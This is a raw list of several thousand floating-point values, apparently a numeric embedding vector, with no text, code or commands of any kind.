0.015121583826839924, -0.007363676559180021, -0.018979419022798538, 0.020936494693160057, -0.007525593042373657, -0.013537619262933731, 0.010109215043485165, -6.702975952066481e-7, -0.02216142788529396, -0.002743778983131051, -0.00012176729796919972, 0.005681153852492571, 0.010559765622019768, 0.0021101930178701878, -0.014023368246853352, 0.00737071642652154, -0.01411488652229309, -0.012171889655292034, -0.009637545794248581, -0.011094793677330017, -0.019796039909124374, 0.01578332856297493, 0.00006000366556691006, -0.0026540211401879787, -0.002914495300501585, 0.009968418627977371, 0.003125690622255206, 0.004456221126019955, -0.012249328196048737, 0.01141158677637577, 0.004843412432819605, 0.02286541275680065, 0.006775849498808384, -0.019472207874059677, -0.006311219651252031, -0.012608359567821026, 0.02677956596016884, -0.002321388339623809, 0.006754729896783829, -0.018979419022798538, -0.005044048186391592, 0.01407264731824398, 0.022949891164898872, -0.006107064429670572, 0.012918112799525261, -0.01157350279390812, -0.012002933770418167, 0.006666732020676136, 0.0015734051121398807, -0.014227524399757385, 0.0328056700527668, 0.003104571020230651, 0.011362307704985142, -0.03981735557317734, -0.016079002991318703, 0.0013982889940962195, 0.008194377645850182, 0.00544179929420352, -0.004171107430011034, -0.019669322296977043, -0.02987709641456604, -0.03542449325323105, 0.02114769071340561, 0.02903231605887413, 0.009855780750513077, -0.001406208728440106, 0.024540895596146584, 0.000544707931112498, -0.019261011853814125, 0.002224590629339218, 0.0006859447457827628, 0.023879149928689003, -0.0252730380743742, -0.0014273283304646611, 0.0026751405093818903, 0.009757223539054394, -0.011101833544671535, -0.011221510358154774, 0.005286922678351402, -0.009778343141078949, 0.010242972522974014, -0.02354123629629612, -0.004185187164694071, 0.0226542167365551, -0.023682033643126488, 0.007335517089813948, 0.012953312136232853, 0.0006925446214154363, -0.0011686140205711126, -0.015121583826839924, -0.005614275112748146, 0.011066634207963943, 0.014811830595135689, -0.04283040761947632, -0.00200107553973794, -0.0032383280340582132, 0.008321095257997513, -0.005758591927587986, 0.024034027010202408, 0.0020063554402440786, 0.002296749036759138, 0.002013395307585597, -0.03449523448944092, 0.009391151368618011, -0.004473820794373751, 0.0056741139851510525, -0.0044351015239953995, -0.028483208268880844, -0.016684429720044136, -0.00020415546896401793, 0.011833976954221725, -0.013931850902736187, 0.019655242562294006, -0.021837595850229263, -0.013396822847425938, -0.01099623553454876, -0.017754485830664635, 0.004498459864407778, -0.040267907083034515, -0.011707260273396969, -0.023752432316541672, 0.006149303633719683, -0.0085745295509696, 0.0026505012065172195, 0.0009565387736074626, 0.014868149533867836, 0.010475287213921547, 0.0023671474773436785, -0.006156343035399914, 0.007377756293863058, 0.043280959129333496, -0.01990867778658867, -0.012439403682947159, -0.01084135938435793, 0.02034514769911766, -0.01362913753837347, -0.0022351504303514957, 0.0018637985922396183, 0.011158152483403683, -0.009313712827861309, -0.012664678506553173, 0.0038895136676728725, 0.0067336102947592735, 0.011418626643717289, 0.01070760190486908, 0.02393546886742115, -0.002914495300501585, 0.004956049844622612, 0.011587582528591156, 0.0016746028559282422, 0.009391151368618011, 0.023794671520590782, 0.01964116469025612, -0.010285211727023125, 0.036466389894485474, 0.02385099045932293, -0.03457971289753914, 0.0005416279891505837, 0.014171205461025238, 0.004681495949625969, -0.0001806159853003919, 0.013284184969961643, -0.021964311599731445, -0.016191640868782997, -0.030693719163537025, 0.019246932119131088, -0.013791053555905819, -0.0009213395533151925, 0.0012618920300155878, 0.02797633782029152, 0.0005922268610447645, -0.0069835251197218895, -0.01652955263853073, 0.013938890770077705, 0.01498078741133213, -0.0040162308141589165, 0.005329161416739225, 0.010559765622019768, 0.0026997800450772047, 0.00866604782640934, -0.00228794920258224, -0.009341872297227383, 0.0026065020356327295, 0.01037672907114029, -0.010186653584241867, -0.02042962610721588, 0.03286198899149895, 0.00019480567425489426, 0.011798777617514133, -0.020401466637849808, 0.0010665362933650613, 0.00030557322315871716, 0.012129650451242924, 0.01972564123570919, 0.0008227817015722394, -0.009524908848106861, -0.028004497289657593, 0.005649474449455738, -0.018768223002552986, 0.018894940614700317, 0.011221510358154774, 0.0011598141863942146, 0.002882815897464752, 0.006525935139507055, -0.02154192142188549, -0.015727011486887932, -0.01768408715724945, -0.020894255489110947, -0.013136348687112331, 0.006346418987959623, 0.02628677524626255, -0.030637400224804878, -0.010327450931072235, -0.009102517738938332, -0.009271473623812199, 0.022147348150610924, 0.010616084560751915, -0.0019852358382195234, -0.016599951311945915, 0.007673429790884256, 0.02948286570608616, 0.0019623565021902323, 0.002296749036759138, -0.012376044876873493, -0.00018787583394441754, 0.008644928224384785, 0.013312344439327717, -0.002507944358512759, -0.004501979798078537, 0.0007739427965134382, -0.018725983798503876, 0.0012337325606495142, 0.013319384306669235, -0.01416416559368372, -0.015797408297657967, 0.0073847961612045765, 0.0027191396802663803, 0.0030640920158475637, 0.01362913753837347, 0.006307699717581272, -0.012017013505101204, 0.0278355423361063, -0.015191982500255108, -0.027103397995233536, 0.002377707278355956, 0.02544199489057064, -0.012868833728134632, -0.0012680517975240946, -0.0024797848891466856, 0.025019604712724686, -0.00525172334164381, 0.0043647028505802155, 0.001576924929395318, -0.022006550803780556, 0.007363676559180021, 0.0012328525772318244, -0.004375262651592493, -0.00030425324803218246, -0.02038738690316677, 0.0068216086365282536, -0.0027508188504725695, -0.0015822048299014568, 0.0024938646238297224, 0.02624453790485859, 0.013326424174010754, 0.020781617611646652, 0.016501393169164658, 0.02490696683526039, 0.009890980087220669, -0.013009631074965, 0.0052728429436683655, 0.018500709906220436, -0.0029708140064030886, 0.006522415205836296, -0.007729748263955116, 0.014642874710261822, 0.00718064047396183, -0.028440969064831734, 0.014882229268550873, -0.005019408650696278, -0.01083431951701641, -0.012383084744215012, -0.013065950013697147, -0.01950036734342575, -0.02069714106619358, 0.0030306526459753513, 0.00626194104552269, -0.036719825118780136, -0.01591004617512226, -0.00800430215895176, -0.010003617964684963, 0.0003680518129840493, 0.020401466637849808, 0.00693776598200202, 0.005596675910055637, -0.004713175352662802, 0.005005328916013241, 0.008159179240465164, 0.01136934757232666, -0.011115913279354572, 0.01586780697107315, -0.003621999640017748, -0.024273380637168884, -0.023034367710351944, -0.008644928224384785, 0.01084135938435793, -0.03336885944008827, 0.019035737961530685, 0.007940943352878094, -0.004252065438777208, -0.014811830595135689, 0.01879638247191906, -0.01416416559368372, 0.0004536299384199083, -0.0148540697991848, 0.000053486313845496625, 0.014544316567480564, -0.0019377169664949179, -0.006525935139507055, 0.007272158283740282, 0.021204009652137756, -0.017698166891932487, -0.01214373018592596, 0.0064027379266917706, -0.016684429720044136, 0.01551581546664238, -0.016276119276881218, -0.008588609285652637, 0.012291567400097847, -0.03162297606468201, 0.012995551340281963, 0.01412192638963461, -0.005892348941415548, 0.00968682486563921, 0.0015822048299014568, 0.012178929522633553, -0.016557712107896805, 0.004730775021016598, -0.001243412378244102, -0.021260328590869904, -0.0038120753597468138, 0.016374675557017326, -0.016388755291700363, -0.004780053626745939, 0.010770960710942745, 0.006656172219663858, 0.011207430623471737, -0.005660034250468016, 0.02824385277926922, -0.003329846076667309, -0.01906389743089676, 0.007159520871937275, -0.01489630900323391, -0.006969445385038853, 0.013305304571986198, -0.005980347283184528, -0.01181285735219717, -0.01941588893532753, -0.0008971400675363839, -0.00028665363788604736, 0.005156685598194599, -0.0032770473044365644, 0.004618137609213591, 0.0014748472021892667, 0.012974431738257408, 0.0019253971986472607, 0.006687851622700691, -0.009489709511399269, 0.007004644256085157, -0.0010506967082619667, -0.0047448547556996346, 0.005227083805948496, 0.004554778803139925, -0.012749156914651394, 0.0005746272508986294, -0.006832168437540531, 0.0036184797063469887, 0.011481985449790955, -0.01094695646315813, 0.008060621097683907, -0.022640137001872063, -0.013277145102620125, 0.02416074275970459, 0.005593155976384878, -0.020457785576581955, -0.01059496495872736, 0.008328135125339031, 0.004741334822028875, -0.011263749562203884, -0.006772329565137625, -0.02513224259018898, -0.006853287573903799, 0.0026540211401879787, 0.005617795046418905, 0.002928575035184622, 0.005825470667332411, 0.011383427307009697, 0.0104189682751894, 0.003185529261827469, -0.023118846118450165, 0.008701247163116932, 0.0030852113850414753, 0.0014352481812238693, -0.00021746517450083047, 0.024400098249316216, 0.007708628661930561, 0.004857492167502642, -0.008356294594705105, -0.0061105843633413315, -0.04908179119229317, -0.0017423613462597132, -0.010038817301392555, -0.0016992422752082348, 0.03201720863580704, 0.005881789140403271, 0.008518210612237453, -0.02651205100119114, -0.004681495949625969, -0.00683568837121129, -0.00008871302998159081, 0.01959892548620701, 0.003532241564244032, -0.02690628170967102, -0.014713273383677006, 0.004748374689370394, 0.003959911875426769, 0.009222195483744144, 0.027962258085608482, 0.006726570427417755, -0.00002154577123292256, 0.009722024202346802, -0.011517183855175972, -0.008152139373123646, 0.006166902836412191, 0.0395357608795166, 0.03426995873451233, -0.007145441137254238, -0.0046392567455768585, -0.00833517499268055, -0.00824365671724081, 0.002833537058904767, -0.029398387297987938, 0.012833635322749615, -0.022217746824026108, -0.013579858466982841, -0.004375262651592493, 0.032918307930231094, -0.000382791506126523, 0.012150770053267479, -0.007532632909715176, 0.0021295526530593634, 0.00004639146936824545, 0.015304620377719402, 0.008039501495659351, -0.0031327304895967245, 0.022414861246943474, -0.005568516440689564, -0.010257052257657051, 0.025695430114865303, 0.0007717428379692137, 0.0011791738215833902, -0.021527841687202454, -0.0006965045467950404, -0.02438601851463318, -0.006997604388743639, 0.018627425655722618, -0.010686482302844524, 0.013037790544331074, -0.005438279360532761, -0.011355267837643623, 0.005234123673290014, -0.0006885846960358322, -0.013037790544331074, -0.01513566356152296, -0.002803617622703314, 0.0029567342717200518, 0.0011774138547480106, 0.0017881202511489391, 0.010207773186266422, 0.00016906624659895897, 0.01733209565281868, -0.009447470307350159, 0.010095136240124702, 0.009032119065523148, 0.003342165844514966, 0.0007919823983684182, 0.03305910527706146, -0.003370325081050396, 0.004804693162441254, -0.023597555235028267, -0.007638230454176664, 0.004322464112192392, 0.00849005114287138, -0.00282121729105711, -0.016966022551059723, 0.011031434871256351, -0.02996157482266426, -0.0034917625598609447, -0.003914153203368187, 0.008835003711283207, 0.03635375201702118, 0.02061266265809536, 0.008363334462046623, 0.0008192618261091411, -0.011531263589859009, 0.004586458206176758, -0.001058616442605853, -0.03443891555070877, 0.021161770448088646, 0.0007501833606511354, -0.01310114935040474, 0.006652652285993099, -0.0005917868693359196, 0.013375703245401382, 0.0039810314774513245, 0.0055473968386650085, 0.006958885584026575, 0.006392178125679493, -0.014009288512170315, -0.004544219002127647, -0.015304620377719402, 0.015811488032341003, -0.004885651636868715, 0.03618479520082474, 0.010088096372783184, 0.0005284282378852367, -0.011453825980424881, 0.02073938027024269, 0.0023407479748129845, -0.009257394820451736, 0.00044681006693281233, -0.019007578492164612, -0.021175850182771683, -0.03373493254184723, 0.006874407175928354, -0.0048891715705394745, 0.009447470307350159, -0.003270007437095046, -0.00438934238627553, -0.001562845311127603, -0.008475971408188343, 0.00009723784023663029, 0.0005011488683521748, 0.001152774435468018, -0.03342517837882042, 0.0032084088306874037, -0.003931752871721983, -0.018514789640903473, 0.0022597897332161665, -0.007356636691838503, 0.01320674642920494, 0.0074270348995924, -0.01968340203166008, -0.029229430481791496, -0.006138743832707405, 0.020725300535559654, 0.01190437562763691, -0.001338450238108635, -0.0016235639341175556, 0.0005953068030066788, -0.013080029748380184, 0.02137296460568905, -0.00008772304863668978, -0.0051461257971823215, 0.003342165844514966, -0.018106477335095406, 0.02069714106619358, -0.020176192745566368, 0.0015206062234938145, -0.005723393056541681, 0.015290540643036366, -0.010242972522974014, -0.024371938779950142, -0.05094030871987343, -0.00698000518605113, 0.02149968221783638, -0.008067660965025425, 0.0011096553644165397, -0.02504776418209076, 0.002097873482853174, 0.027427230030298233, -0.003815595293417573, -0.008560449816286564, 0.0011536544188857079, -0.007078562863171101, 0.0001108225405914709, 0.03305910527706146, 0.003921193070709705, 0.021781276911497116, 0.013713615015149117, 0.010313371196389198, 0.0014009288279339671, -0.0013498900225386024, 0.005033488385379314, -0.019162453711032867, 0.002178831724449992, 0.0019764360040426254, 0.002888095797970891, 0.01683930680155754, -0.005037008319050074, -0.005188364535570145, -0.004294304642826319, -0.03390388563275337, -0.016543632373213768, 0.00410070875659585, -0.010454167611896992, -0.004097188822925091, 0.011383427307009697, 0.0021717918571084738, 0.024259300902485847, -0.013023710809648037, -0.02092241495847702, -0.011559423059225082, -0.01034857053309679, 0.00930667296051979, 0.023076606914401054, 0.02366795390844345, -0.010531606152653694, 0.011362307704985142, -0.006230261642485857, 0.006430897396057844, 0.0016543632373213768, 0.007645270321518183, -0.024794328957796097, -0.004540699068456888, -0.0027719384524971247, -0.00808878056704998, -0.0004127108259126544, 0.008511170744895935, -0.03165113553404808, 0.00013771693920716643, -0.0017221217276528478, -0.05026448518037796, -0.030468443408608437, 0.0022017110604792833, -0.013565778732299805, -0.0001362869661534205, -0.008806844241917133, -0.013270105235278606, -0.015938205644488335, 0.01954260654747486, 0.011101833544671535, 0.015881886705756187, -0.0010014177532866597, 0.01367137674242258, -0.0009222195367328823, 0.013967050239443779, -0.01764184795320034, 0.0035938401706516743, -0.021358884871006012, -0.008461891673505306, -0.008483011275529861, 0.00007996822387212887, 0.04159139469265938, -0.03136954456567764, -0.018979419022798538, 0.01600860431790352, 0.021640479564666748, -0.002969054039567709, 0.005916988477110863, -0.001734441495500505, -0.001175653887912631, 0.0056565143167972565, -0.02845504879951477, 0.019035737961530685, -0.004396382253617048, 0.0029074554331600666, -0.0016068443655967712, -0.011686140671372414, 0.012185969389975071, -0.0028106574900448322, -0.014994867146015167, -0.01724761724472046, -0.015008946880698204, -0.02300620824098587, -0.0039423126727342606, 0.005769151728600264, -0.019796039909124374, -0.009961378760635853, -0.0003702517715282738, -0.023330042138695717, 0.002824737224727869, 0.01065832283347845, -0.0013534099562093616, -0.007085602730512619, -0.004403422120958567, -0.008806844241917133, 0.005614275112748146, 0.012826595455408096, 0.00544179929420352, 0.0027912980876863003, 0.014642874710261822, -0.01733209565281868, 0.00037399170105345547, -0.012981471605598927, 0.01555805467069149, -0.006163382902741432, 0.009468589909374714, -0.015797408297657967, -0.0001398068998241797, 0.006906086578965187, -0.006188022438436747, -0.006290100514888763, -0.006142263766378164, 0.017670007422566414, 0.006166902836412191, 0.006698411423712969, -0.006223221775144339, -0.003159129759296775, 0.013931850902736187, -0.002567782998085022, -0.009574186988174915, 0.01595228537917137, -0.005772671662271023, -0.01600860431790352, -0.0038578342646360397, 0.010686482302844524, 0.009567147120833397, 0.004572378471493721, -0.008405573666095734, -0.009982498362660408, -0.0035216817632317543, -0.0006494255503639579, 0.020978733897209167, -0.0034125642850995064, 0.00775790773332119, -0.010285211727023125, -0.004248545505106449, 0.02145744301378727, 0.007926863618195057, 0.0018567587248981, 0.003104571020230651, -0.02269645594060421, -0.0003152530116494745, 0.015895966440439224, -0.00457589840516448, -0.03410100191831589, -0.01945812813937664, -0.0025642630644142628, 0.011094793677330017, -0.005881789140403271, -0.03666350618004799, 0.006888486910611391, -0.012291567400097847, 0.003625519573688507, -0.008637888357043266, 0.013854412361979485, -0.014516158029437065, -0.04043686017394066, -0.022809093818068504, -0.001473087235353887, 0.008053581230342388, 0.030862674117088318, 0.004297824576497078, 0.002550183329731226, -0.007694548927247524, 0.004523099400103092, -0.0036114398390054703, -0.010271131992340088, 0.025808066129684448, 0.0012275727931410074, -0.01498078741133213, -0.024794328957796097, -0.01600860431790352, 0.010109215043485165, -0.00506516732275486, 0.010390808805823326, -0.020063554868102074, 0.002842336893081665, 0.02168271876871586, 0.0057832314632833, 0.011348227970302105, 0.0013261305866762996, 0.01005993690341711, -0.02007763460278511, -0.007198240142315626, 0.00017742605996318161, 0.017585529014468193, -0.011883256025612354, -0.019176533445715904, -0.004600537940859795, -0.0022985090035945177, 0.006131703965365887, 0.010010657832026482, 0.012749156914651394, -0.007004644256085157, -0.012882913462817669, 0.030017893761396408, 0.007539672311395407, -0.0037240772508084774, -0.015177902765572071, -0.005265803076326847, 0.004558298736810684, 0.01334050390869379, 0.011777658015489578, -0.01174949947744608, -0.004949009977281094, 0.015895966440439224, 0.010827279649674892, -0.019359569996595383, -0.0003152530116494745, 0.011066634207963943, 0.00669489149004221, 0.0010110975708812475, -0.02880704030394554, -0.02287949249148369, -0.01702234148979187, -0.0020573942456394434, 0.003938792739063501, -0.009003959596157074, 0.02641349285840988, -0.02096465416252613, -0.004449181258678436, 0.006378098390996456, 0.0035885602701455355, -0.0021506722550839186, -0.03103163093328476, -0.005051087588071823, 0.00228794920258224, 0.004917330574244261, 0.01985235884785652, -0.0122352484613657, 0.005515717435628176, 0.005955707747489214, -0.03626927360892296, -0.015797408297657967, -0.005505157634615898, -0.010799120180308819, 0.01662811078131199, 0.020626742392778397, -0.02211918868124485, -0.002242190297693014, -0.004980689380317926, -0.026934441179037094, 0.01631835848093033, -0.005403080023825169, -0.009081398136913776, -0.006754729896783829, -0.02127440832555294, 0.005283402744680643, 0.023963628336787224, 0.00296377413906157, -0.015375018119812012, -0.009433390572667122, 0.031228747218847275, -0.011925495229661465, 0.01493854820728302, 0.014839990064501762, -0.002661061007529497, -0.010447127744555473, 0.02030290849506855, -0.004322464112192392, -0.008616768755018711, 0.017458811402320862, -0.00737071642652154, 0.0020837937481701374, 0.00737071642652154, 0.0002220850728917867, 0.015417257323861122, -0.001617404050193727, 0.010890638455748558, 0.01803607866168022, 0.0044527011923491955, -0.02048594504594803, -0.00001434093155694427, -0.022443020716309547, 0.011298948898911476, -0.009834661148488522, 0.005279882811009884, 0.004061989951878786, -0.011137032881379128, -0.002824737224727869, -0.011629821732640266, 0.0040338304825127125, -0.015924125909805298, 0.007793107070028782, -0.018373992294073105, -0.0007977022905834019, -0.039648398756980896, 0.023569395765662193, -0.015079344622790813, 0.012495722621679306, 0.014811830595135689, 0.0020697140134871006, -0.00953194871544838, -0.03148218244314194, 0.0037064775824546814, -0.009567147120833397, -0.009116597473621368, 0.005677633918821812, -0.01768408715724945, 0.01902165822684765, -0.0021964311599731445, 0.01609308272600174, -0.023386361077427864, -0.018683744594454765, 0.03584688529372215, -0.0018549987580627203, -0.005079247057437897, -0.011636861599981785, 0.0023231483064591885, -0.007141921203583479, 0.015980444848537445, 0.026709167286753654, -0.005916988477110863, 0.013910731300711632, 0.012171889655292034, -0.007272158283740282, 0.022851333022117615, -0.014910388737916946, -0.0036994379479438066, -0.00414646789431572, -0.010566805489361286, -0.0046568564139306545, 0.008039501495659351, -0.0073495968244969845, -0.01959892548620701, 0.005121486261487007, -0.016825227066874504, -0.013326424174010754, -0.026188218966126442, -0.010102175176143646, 0.023414520546793938, -0.005814910866320133, 0.03576240688562393, -0.016543632373213768, -0.005082766991108656, 0.00919403601437807, 0.003261207602918148, -0.004702615551650524, 0.004956049844622612, 0.01866966485977173, 0.003595600137487054, 0.019627084955573082, -0.00837741419672966, 0.015220141969621181, 0.021696798503398895, -0.013938890770077705, 0.0067160106264054775, -0.007793107070028782, 0.007377756293863058, 0.004941970109939575, 0.021288488060235977, -0.0063323392532765865, 0.009123637340962887, -0.0064942557364702225, -0.017177218571305275, 0.0014044487616047263, -0.0071348813362419605, -0.014065607450902462, -0.0020063554402440786, 0.03041212446987629, 0.018106477335095406, 0.007666389923542738, -0.010179613716900349, -0.014628794975578785, -0.01892310008406639, -0.0022140308283269405, -0.01234788540750742, -0.012024053372442722, -0.0021506722550839186, 0.016656270250678062, 0.00033857248490676284, 0.006480176001787186, 0.00260474206879735, 0.0004743094614241272, -0.006972965318709612, -0.018866781145334244, -0.00699408445507288, 0.014487998560070992, 0.004167587496340275, 0.011270789429545403, 0.0032911268062889576, -0.00587122980505228, 0.0275680273771286, -0.015938205644488335, 0.01396001037210226, 0.015248301438987255, -0.013748814351856709, -0.011003275401890278, -0.022710535675287247, 0.005589636042714119, -0.007743827998638153, 0.015177902765572071, 0.0012645318638533354, 0.009510829113423824, 0.019781960174441338, 0.009179956279695034, 0.012122610583901405, -0.004713175352662802, 0.0006159862969070673, -0.003544561332091689, -0.004037350416183472, 0.023062527179718018, -0.010433048009872437, 0.0013305305037647486, -0.0032770473044365644, 0.0046568564139306545, -0.02837057039141655, 0.006863847374916077, 0.0020063554402440786, -0.002131312619894743, 0.008018381893634796, -0.015853727236390114, 0.016388755291700363, 0.01693786308169365, 0.004498459864407778, 0.005417159758508205, -0.018205035477876663, -0.0019482767675071955, -0.014234564267098904, -0.015895966440439224, -0.002884575864300132, -0.0022263505961745977, -0.032918307930231094, 0.02903231605887413, 0.0012196529423817992, 0.02690628170967102, -0.0033597652800381184, 0.0008945001172833145, 0.012017013505101204, -0.0068603274412453175, -0.01782488450407982, -0.009468589909374714, -0.0033984845504164696, 0.008384454064071178, -0.0107920803129673, 0.012868833728134632, -0.005392520222812891, 0.0030306526459753513, -0.01954260654747486, 0.010785040445625782, -0.004065509885549545, 0.024104423820972443, 0.0030852113850414753, 0.01214373018592596, -0.010573845356702805, -0.002284429268911481, -0.003490002593025565, -0.0004204106517136097, -0.011165192350745201, 0.006466096267104149, 0.03905705362558365, 0.0056001958437263966, 0.0009178196196444333, -0.022935811430215836, -0.01964116469025612, -0.012080371379852295, 0.005793791264295578, 0.010770960710942745, 0.027201956138014793, 0.0036184797063469887, -0.022766854614019394, 0.022400783374905586, -0.0164028350263834, 0.029539184644818306, 0.01194661483168602, 0.007286238018423319, 0.005959227681159973, 0.005248203407973051, -0.007722708396613598, -0.00982058234512806, 0.02168271876871586, -0.0015531654935330153, 0.010890638455748558, 0.009461550042033195, -0.017008261755108833, -0.006543534807860851, -0.013593938201665878, -0.002833537058904767, -0.00751151330769062, 0.01063720416277647, -0.010228892788290977, -0.007272158283740282, -0.02748354896903038, 0.002333708107471466, 0.012974431738257408, -0.010320411063730717, 0.019261011853814125, 0.005881789140403271, -0.012094451114535332, -0.0029884136747568846, -0.013762894086539745, 0.016698509454727173, 0.02523079887032509, 0.0008940601255744696, -0.017134979367256165, -0.008982840925455093, 0.0009230995201505721, 0.014051527716219425, 0.02073938027024269, -0.018909020349383354, 0.0015074064722284675, -0.005990907084196806, 0.0005653874250128865, 0.006335859186947346, 0.017008261755108833, -0.006114104297012091, 0.010447127744555473, -0.006068345159292221, -0.00587474973872304, -0.006582253612577915, -0.0064203375950455666, -0.002998973475769162, -0.008159179240465164, 0.019669322296977043, 0.007412955164909363, -0.01644507423043251, -0.022893572226166725, -0.0005513077485375106, -0.02052818424999714, 0.011932535097002983, 0.02331596240401268, -0.027779223397374153, -0.040267907083034515, 0.0148540697991848, -0.0030940112192183733, 0.0026821803767234087, -6.840472792646324e-7, 0.009461550042033195, 0.019824199378490448, -0.008827963843941689, -0.010334490798413754, 0.004347103647887707, 0.00462165754288435, 0.006557614542543888, 0.004713175352662802, -0.016909703612327576, -0.01591004617512226, -0.0010515766916796565, 0.011200391687452793, -0.0023636275436729193, -0.0002846736751962453, 0.0018409191397950053, 0.000129467123770155, 0.004185187164694071, 0.013002591207623482, 0.020316988229751587, 0.004706135485321283, -0.018599266186356544, -0.020148033276200294, 0.005572036374360323, -0.014431679621338844, -0.009637545794248581, 0.005322122015058994, -0.01605084352195263, 0.011390467174351215, 0.0002604742185212672, -0.010123294778168201, 0.014502078294754028, 0.00870828703045845, 0.01679706759750843, 0.024048106744885445, 0.020584503188729286, -0.01099623553454876, 0.010158494114875793, 0.01198885403573513, -0.0007743827882222831, 0.005473478231579065, -0.010066976770758629, 0.002558983163908124, 0.035480812191963196, -0.0003896113485097885, -0.010010657832026482, 0.01252388209104538, 0.013192666694521904, 0.0038754339329898357, -0.0008091420168057084, -0.013361623510718346, 0.019092055037617683, 0.003544561332091689, 0.013896651566028595, 0.033481497317552567, 0.00472021522000432, 0.005403080023825169, -0.003878953866660595, -0.01648731343448162, -0.0048187728971242905, 0.006719530560076237, 0.01652955263853073, 0.012530921958386898, 0.013361623510718346, -0.029764458537101746, -0.02007763460278511, 0.019176533445715904, -0.0019077976467087865, -0.023907309398055077, -0.02145744301378727, 0.031144268810749054, -0.007490393705666065, -0.003292886773124337, 0.0034741628915071487, 0.01724761724472046, -0.029736299067735672, 0.010524566285312176, -0.0056565143167972565, 0.015276460908353329, 0.01826135441660881, 0.016388755291700363, 0.00346888299100101, -0.0026029821019619703, 0.0029127353336662054, -0.02406218647956848, 0.019077977165579796, -0.005082766991108656, -0.004688535816967487, -0.01092583779245615, -0.00043625032412819564, -0.002126032719388604, -0.003562161000445485, 0.023414520546793938, -0.0075537520460784435, 0.01985235884785652, 0.001860278658568859, -0.019120214506983757, -0.027427230030298233, 0.016036763787269592, -0.0043647028505802155, 0.00808878056704998, 0.0005724272923544049, -0.004934930242598057, -0.035931363701820374, 0.016698509454727173, 0.0015082864556461573, -0.0035164018627256155, 0.008567489683628082, -0.0002928134927060455, 0.002441065851598978, 0.015487655997276306, -0.002258029766380787, -0.008940601721405983, 0.02176719717681408, -0.02797633782029152, 0.003636079141870141, 0.009447470307350159, 0.021907992660999298, 0.00418870709836483, 0.031087949872016907, -0.006237301509827375, 0.02482248842716217, -0.005797311197966337, -0.0051109264604747295, 0.01954260654747486, 0.014811830595135689, 0.0003711317549459636, 0.004509019665420055, 0.029201271012425423, 0.017881203442811966, -0.014713273383677006, 0.022231826558709145, -0.008328135125339031, -0.0013278905535116792, -0.010742801241576672, -0.01214373018592596, 0.01416416559368372, -0.005216524004936218, 0.02273869514465332, -0.00525172334164381, -0.000369371788110584, -0.013185626827180386, 0.020049475133419037, -0.007071522995829582, -0.014178245328366756, -0.013650257140398026, -0.019697481766343117, -0.0007462234352715313, 0.015248301438987255, -0.01657179184257984, 0.009257394820451736, -0.026005182415246964, -0.01398816891014576, 0.012791396118700504, 0.0006269860896281898, -0.0068603274412453175, 0.01826135441660881, -0.0006063065375201404, 0.00007314837421290576, 0.007011684123426676, -0.007342556957155466, 0.008440772071480751, -0.0030975311528891325, -0.004934930242598057, -0.006195062305778265, -0.011334148235619068, -0.03472051024436951, 0.014614715240895748, 0.017613688483834267, 0.00236010761000216, 0.006135223899036646, 0.02176719717681408, -0.006807528901845217, -0.008827963843941689, 0.015543974936008453, 0.013952970504760742, 0.009546027518808842, -0.009010999463498592, 0.004991249181330204, 0.004480860661715269, -0.002977853873744607, 0.008842043578624725, 0.011974774301052094, -0.0014986067544668913, 0.017303936183452606, 0.01564253307878971, -0.001328770536929369, 0.021443363279104233, 0.029454706236720085, -0.008898362517356873, -0.006335859186947346, -0.0003623319498728961, -0.006554094608873129, -0.012129650451242924, 0.002544903429225087, 0.0009794182842597365, 0.006923686247318983, 0.007983182556927204, 0.008673087693750858, -0.001607724349014461, 0.0008412612951360643, 0.003991591278463602, 0.014769592322409153, -0.003717037383466959, 0.011869176290929317, -0.018894940614700317, -0.008968761190772057, -0.0044879005290567875, -0.0014766071690246463, 0.010728721506893635, 0.005660034250468016, -0.01478367205709219, 0.0038754339329898357, -0.0004320704028941691, 0.013727694749832153, -0.01108071394264698, 0.012699877843260765, -0.03272119164466858, -0.02079569734632969, -0.0043259840458631516, -0.004857492167502642, 0.018106477335095406, -0.01509342435747385, -0.0053256419487297535, -0.008398533798754215, 0.003921193070709705, -0.006328819319605827, 0.01755736954510212, 0.018106477335095406, -0.004294304642826319, -0.009538988582789898, -0.026849962770938873, -0.00007815326534910128, 0.015431337058544159, 0.0018884380115196109, -0.020936494693160057, -0.002465705154463649, -0.015220141969621181, 0.0013085309183225036, -0.010179613716900349, -0.018599266186356544, 0.00841965340077877, 0.003843754529953003, 0.005667074117809534, -0.01871190406382084, -0.017796725034713745, -0.01281251572072506, -0.0021330725867301226, 0.010447127744555473, -0.0052728429436683655, -0.01478367205709219, 0.015966365113854408, 0.006906086578965187, 0.011995893903076649, -0.020626742392778397, -0.001554045476950705, -0.011995893903076649, -0.0026417013723403215, -0.012840675190091133, 0.0092433150857687, -0.003076411783695221, -0.014192325063049793, -0.014572476036846638, -0.006723050493746996, -0.01733209565281868, 0.0328056700527668, -0.007539672311395407, 0.02048594504594803, -0.008581569418311119, 0.015487655997276306, 0.003833194961771369, 0.01733209565281868, -0.006223221775144339, -0.0023407479748129845, 0.00689200684428215, 0.021358884871006012, -0.009876900352537632, -0.017543289810419083, 0.002830017125234008, 0.003562161000445485, 0.010158494114875793, 0.0027420190162956715, 0.00844781193882227, 0.005177805200219154, -0.00506516732275486, -0.018205035477876663, 0.007863505743443966, -0.02048594504594803, -0.010207773186266422, -0.0213166456669569, -0.021077292039990425, -0.0234004408121109, -0.008081740699708462, 0.020274749025702477, 0.029201271012425423, 0.023414520546793938, -0.005167245399206877, 0.011552383191883564, -0.0029972135089337826, -0.001630603801459074, -0.00046022978494875133, 0.028821120038628578, -0.016374675557017326, 0.010482327081263065, 0.010918797925114632, -0.03522737696766853, -0.013023710809648037, -0.0027261795476078987, 0.011277829296886921, 0.0014185284962877631, -0.024921046569943428, -0.009736103937029839, 0.019444048404693604, 0.006356978788971901, 0.01733209565281868, -0.00019832559337373823, 0.01914837397634983, -0.017303936183452606, -0.012397164478898048, -0.022907651960849762, 0.00462165754288435, 0.011890295892953873, 0.009546027518808842, -0.00009888780186884105, -0.013058910146355629, -0.007075042929500341, 0.010411928407847881, 0.017937522381544113, 0.013185626827180386, -0.004361182916909456, 0.011601662263274193, -0.03142586350440979, -0.0009389391634613276, 0.017881203442811966, 0.0002868736337404698, 0.01817687600851059, -0.004959569778293371, -0.0008456612122245133, 0.014473918825387955, -0.014713273383677006, 0.015304620377719402, -0.0013842092594131827, -0.0003090931277256459, 0.010003617964684963, -0.001964116469025612, -0.0028581765946000814, 0.00844781193882227, -0.023639794439077377, 0.043506234884262085, -0.001576924929395318, -0.009722024202346802, -0.02539975568652153, -0.007525593042373657, -0.021035052835941315, 